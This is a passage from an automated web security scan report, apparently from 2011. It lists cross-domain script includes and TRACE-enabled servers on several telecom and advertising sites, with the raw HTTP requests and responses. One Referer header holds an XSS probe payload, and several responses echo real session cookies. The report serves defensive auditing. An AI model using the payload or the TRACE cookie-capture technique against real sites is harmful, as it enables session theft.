</script>
<script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-7elq8ZYievA_s&callback=qc_results" ></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Yahoo Retargeting -->
<script src='http://adreadytractions.com/rt/233231?p=8831'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Yahoo Retargeting -->
<script src='http://adreadytractions.com/rt/233231?p=8831'></script>
...[SNIP]...

16.65. http://www.ooma.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ooma.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.ooma.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Last-Modified: Tue, 06 Sep 2011 11:25:09 GMT
ETag: "4f66dd53eaae6abc866a12e1c38377e7"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Length: 19669
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...
</script>
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"></script>
<script language="JavaScript" src="http://Ooma.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>
           <script type="text/javascript" src="https://edge.quantserve.com/quant.js"></script>
...[SNIP]...

16.66. http://www.ooma.com/premier  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ooma.com
Path:   /premier

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /premier HTTP/1.1
Host: www.ooma.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS7755cd8bc8424ab1d27f14d04d5a5a56=npu0136i2olrdchgh3cn570or2; has_js=1; __utmx=238888606.; __utmxx=238888606.; __utma=257238996.1845384337.1315327926.1315327926.1315327926.1; __utmb=257238996.1.10.1315327926; __utmc=257238996; __utmz=257238996.1315327926.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; _chartbeat2=qemhbgfmeo01qhct.1315327925630

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Last-Modified: Tue, 06 Sep 2011 11:32:28 GMT
ETag: "c7b25363aeb081cef4cc76ffe8e76ca0"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Length: 14659
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...
</script>
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"></script>
<script language="JavaScript" src="http://Ooma.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"></script>
...[SNIP]...
<img src="http://r.casalemedia.com/r?u=155828" width="1" height="1" alt="" />
<script type="text/javascript" src="http://beacon.dedicatednetworks.com/js/t.aspx?aid=084BF99942C00D12">
</script>
...[SNIP]...
</noscript>
<script src="http://ads.lucidmedia.com/clicksense/pixel?id=100842&t=s"></script>
...[SNIP]...
</script>
           <script type="text/javascript" src="https://edge.quantserve.com/quant.js"></script>
...[SNIP]...

16.67. http://www.ooma.com/premier/features  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ooma.com
Path:   /premier/features

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /premier/features HTTP/1.1
Host: www.ooma.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/premier
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS7755cd8bc8424ab1d27f14d04d5a5a56=npu0136i2olrdchgh3cn570or2; __utmx=238888606.; __utmxx=238888606.; has_js=1; __utma=257238996.1845384337.1315327926.1315327926.1315327926.1; __utmb=257238996.2.10.1315327926; __utmc=257238996; __utmz=257238996.1315327926.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; _chartbeat2=qemhbgfmeo01qhct.1315327925630

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:27:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Last-Modified: Tue, 06 Sep 2011 12:26:14 GMT
ETag: "a2e607b451d833089a1b580389cc203e"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Length: 32669
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...
</script>
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"></script>
<script language="JavaScript" src="http://Ooma.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"></script>
...[SNIP]...
</script>
           <script type="text/javascript" src="https://edge.quantserve.com/quant.js"></script>
...[SNIP]...

16.68. http://www.vonage.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Mon, 13 Nov 1996 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 11:52:07 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 42201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<!--iPerceptions-->
<script type="text/javascript" src="http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_layer_Invitation_722.js"></script>
...[SNIP]...

16.69. http://www.whitefence.com/404.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /404.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /404.html HTTP/1.1
Host: www.whitefence.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/high-speed-internet23bef%22%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3Eaffc43fb5c2/
Cookie: PHPSESSID=b5g3jlvu9jqg4vvgfhk6r1grh3

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:02:32 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 47389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<meta name="google-site-verification" content="p2XZph2E52nUsdioUNHg56J1Qa5oNYY8AmcLs_Veju8" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.5.2/build/yuiloader-dom-event/yuiloader-dom-event.js&2.5.2/build/selector/selector-beta-min.js"></script>
...[SNIP]...

16.70. http://www.whitefence.com/category/high-speed-internet/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/high-speed-internet/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /category/high-speed-internet/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/television-service/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D; _vis_opt_test_cookie=1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:32 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 31539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<meta name="google-site-verification" content="p2XZph2E52nUsdioUNHg56J1Qa5oNYY8AmcLs_Veju8" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.5.2/build/yuiloader-dom-event/yuiloader-dom-event.js&2.5.2/build/selector/selector-beta-min.js"></script>
...[SNIP]...

16.71. http://www.whitefence.com/category/home-phone/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/home-phone/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /category/home-phone/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:54 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 29323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<meta name="google-site-verification" content="p2XZph2E52nUsdioUNHg56J1Qa5oNYY8AmcLs_Veju8" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.5.2/build/yuiloader-dom-event/yuiloader-dom-event.js&2.5.2/build/selector/selector-beta-min.js"></script>
...[SNIP]...

16.72. http://www.whitefence.com/category/television-service/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/television-service/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /category/television-service/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/home-phone/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:27 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 29242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<meta name="google-site-verification" content="p2XZph2E52nUsdioUNHg56J1Qa5oNYY8AmcLs_Veju8" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.5.2/build/yuiloader-dom-event/yuiloader-dom-event.js&2.5.2/build/selector/selector-beta-min.js"></script>
...[SNIP]...

17. TRACE method is enabled  previous  next
There are 21 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


17.1. http://40.xg4ken.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://40.xg4ken.com
Path:   /

Request

TRACE / HTTP/1.0
Host: 40.xg4ken.com
Cookie: 16bca7a18b4d6058

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:53 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: 40.xg4ken.com
Cookie: 16bca7a18b4d6058; kenshoo_id=200d2a28-23e9-a048-8372-00005235d564


17.2. http://ads.media.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.media.net
Path:   /

Request

TRACE / HTTP/1.0
Host: ads.media.net
Cookie: a612680ee2f88284

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:45:18 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: ads.media.net
Cookie: a612680ee2f88284


17.3. http://gdyn.pgatour.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gdyn.pgatour.com
Path:   /

Request

TRACE / HTTP/1.0
Host: gdyn.pgatour.com
Cookie: d7374c72105c17d3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:31 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: gdyn.pgatour.com
Cookie: d7374c72105c17d3; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true


17.4. http://integrate.112.2o7.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://integrate.112.2o7.net
Path:   /

Request

TRACE / HTTP/1.0
Host: integrate.112.2o7.net
Cookie: f3f08c0dcbf6d7c9

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:43 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: integrate.112.2o7.net
Cookie: f3f08c0dcbf6d7c9; s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113D
...[SNIP]...

17.5. https://login.aptela.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.aptela.com
Path:   /

Request

TRACE / HTTP/1.0
Host: login.aptela.com
Cookie: 4ac389a7cf04b187

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:37 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: login.aptela.com
Cookie: 4ac389a7cf04b187; __utmx_k_180787838=1; __utmx=207344579.; __utmxx=207344579.; __utmc=207344579; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958;
...[SNIP]...

17.6. http://mi.adinterax.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mi.adinterax.com
Path:   /

Request

TRACE / HTTP/1.0
Host: mi.adinterax.com
Cookie: 54786a97101eaf9e

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Tue, 06 Sep 2011 12:44:47 GMT
Content-Type: message/http
Content-Length: 164
Expires: Tue, 06 Sep 2011 12:44:47 GMT
Connection: close

TRACE / HTTP/1.0
Host: mi.adinterax.com
Cookie: 54786a97101eaf9e; adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223
_FP_X_URL: http://mi.adinterax.com/


17.7. http://optimized-by.rubiconproject.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: optimized-by.rubiconproject.com
Cookie: e4ca4145da2fcbb6

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:53 GMT
Server: RAS/1.3 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: e4ca4145da2fcbb6; put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g
...[SNIP]...

17.8. http://pixel.everesttech.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.everesttech.net
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.everesttech.net
Cookie: 6907e5a0bca27aa

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:10 GMT
Server: Apache
Vary: X-EF-Forwarded-For
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.everesttech.net
Cookie: 6907e5a0bca27aa; gglck=zqROZUBXyFQAAIdR; everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; everest_session_v2=AXNOZhaIGXMAAIM3
Connection: Keep-Alive
X-EF-Forwarded-For: 50.23.123.106


17.9. http://pixel.fetchback.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.fetchback.com
Cookie: 21821bfc4e605b93

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:05 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.fetchback.com
Cookie: 21821bfc4e605b93; opt=1; cmp=1_1315309925; uid=1_1315309925_1315309925595:3279793012126635; kwd=1_1315309925; sit=1_1315309925; cre=1_1315309925; bpd=1_1315309925; apd=1_1315309925; scg=1_1315309925; ppd=1_1315309925;
...[SNIP]...

17.10. http://sensor2.suitesmart.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /

Request

TRACE / HTTP/1.0
Host: sensor2.suitesmart.com
Cookie: b93c6c2430fd9c08

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:50 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: sensor2.suitesmart.com
Cookie: b93c6c2430fd9c08; G15740=C1S104345-1-0-0-0-1314814746-0; spass=a1bfb027540676fe37eda0dd3047b05c; G15493=C1S99917-2-0-0-0-1315313090-0


17.11. http://show.partners-z.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://show.partners-z.com
Path:   /

Request

TRACE / HTTP/1.0
Host: show.partners-z.com
Cookie: 3270cf3a9ec9f534

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:54 GMT
Server: Apache/2.2.9 (Debian)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: show.partners-z.com
Cookie: 3270cf3a9ec9f534


17.12. http://sitesearch.comcast.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitesearch.comcast.com
Path:   /

Request

TRACE / HTTP/1.0
Host: sitesearch.comcast.com
Cookie: f1ac992ed3256afd

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:22:13 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: sitesearch.comcast.com
Cookie: f1ac992ed3256afd; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; mbox=session#1315327839174-766376#1315330223|check#true#1315328423; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%255D%7C1473180639972%3B%2
...[SNIP]...

17.13. http://support.aptela.com:9000/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.aptela.com:9000
Path:   /

Request

TRACE / HTTP/1.0
Host: support.aptela.com
Cookie: 9e61a8560151be49

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:49 GMT
Server: Apache/2.0.55 (Ubuntu) mod_jk/1.2.20 PHP/5.1.2 mod_ssl/2.0.55 OpenSSL/0.9.8a
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: support.aptela.com
Cookie: 9e61a8560151be49; __utmx_k_180787838=1; __utmx=207344579.; __utmxx=207344579.; __utmc=207344579; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958;
...[SNIP]...

17.14. http://www.aptela.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.aptela.com
Cookie: 7fec44a8bea380ad

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:59 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.aptela.com
Cookie: 7fec44a8bea380ad


17.15. http://www.fairpoint.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fairpoint.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.fairpoint.com
Cookie: 25330e177d2c95be

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:56:20 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_jk/1.2.23
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.fairpoint.com
Cookie: 25330e177d2c95be; JSESSIONID=24578CF2F7156AB48FCFDA58BB99F9A0


17.16. http://www.myfitv.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.myfitv.com
Cookie: cfb275e8afb9ea15

Response

HTTP/1.1 200 OK
Content-Type: message/http
Date: Tue, 06 Sep 2011 12:29:51 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Content-Length: 397
Connection: Close

TRACE / HTTP/1.1
host: www.myfitv.com
Cookie: cfb275e8afb9ea15; fitvuser=fitvuser_etiamsodalesorciat; _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIh4vcG9ydGFsL3JlY2VudF90dl9lbGFzdGljIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--c52e71f8ca5af51
...[SNIP]...

17.17. http://www.ooma.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ooma.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ooma.com
Cookie: 6322ae4c5c835d21

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:03 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ooma.com
Cookie: 6322ae4c5c835d21; SESS7755cd8bc8424ab1d27f14d04d5a5a56=npu0136i2olrdchgh3cn570or2


17.18. http://www.pgatour.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pgatour.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.pgatour.com
Cookie: 71c845dccd1e506f

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:27 GMT
Server: Apache
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: www.pgatour.com
Cookie: 71c845dccd1e506f
X-Forwarded-For: 50.23.123.106
X-Forwarded-Host: www.pgatour.com
X-Forwarded-Server: www.pgatour.com
Connection: Keep-Alive


17.19. http://www.vonage.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.vonage.com
Cookie: 4382ceb9ad7df18a

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:07 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.vonage.com
Cookie: 4382ceb9ad7df18a


17.20. http://www.whitefence.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.whitefence.com
Cookie: dd6ec2cc4aabe83a

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:56 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: dd6ec2cc4aabe83a; PHPSESSID=7mgkb57jloi23h6h58j84sq2b4
